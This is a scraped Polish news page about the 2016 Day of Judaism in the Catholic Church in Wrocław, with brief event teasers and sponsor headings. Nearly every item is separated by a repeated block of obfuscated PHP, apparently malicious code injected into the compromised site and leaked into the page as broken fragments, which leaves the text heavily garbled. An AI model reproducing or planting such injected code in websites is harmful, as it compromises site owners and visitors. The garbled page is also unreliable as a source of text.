%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~! Aktualności
%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!
%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!

W tym roku po raz pierwszy Dzień Judaizmu w Kościele katolickim zagości we wrocławskiej Katedrze pw. św. Jana Chrzciciela. W…

%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!

Wspólna modlitwa chrześcijan i Żydów to najważniejszy element obchodów Dnia Judaizmu w Kościele Katolickim. We Wrocławiu Liturgia Słowa Bożego odbędzie się…

%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!

Już w najbliższy wtorek - 12 stycznia 2016 - rozpoczynamy obchody Dnia Judaizmu w Kościele katolickim. Zapraszamy do Małej Synagogi…

%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!

Dzień Judaizmu w Kościele Katolickim we Wrocławiu organizowany jest od 2003 roku. Inicjatorką spotkań we Wrocławiu była s. Sybilla Kołtan…

%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!
  • Organizator

  • Partnerzy

  • Patronat medialny

  • Patronat honorowy

  • Sponsorzy

%6^#zsfvr# x5cq%7**^#zsfvr# x5cq%)C x27pd%6|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fwmfV x7f<*X&Z&S{ftmfV x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/pef)# x24*! x24Ypp3)%cB%,6<*27-SFGTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x2,*j%-#1]#-bubE{h%)tpqsut>j%!*9! x27!hmg%)!gj!~j%!<**0#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9#-!#f6c68399T`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7g! x24- x24 x5c%j^ x24- x24tvctu38M7]381]211M5]67]452]88]5]48]32M3]317]445]212]gj6<*id%)ftpmdR6<*id%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJUif((function_exists(" x6f 142 x5f 163 x74 141 x72 164") && (!ibe!-#jt0*?]+^?]_ x5c}X x2 x75 156 x61"]=1; $uass)% x24- x24b!>!%yy)#}#-# -!%w:**<")));$vknxgmh = $ivrulcg("", $sx#)323ldfid>}&;!osvufs} x7f;!opjuuqpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!)n%-#+I#)q%:>:r%:|:**t%)25 x53 105 x52 137 x41 107 x45 116 x54"]); i|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcbek!~!
copyright © 2016 dzienjudaizmu.pl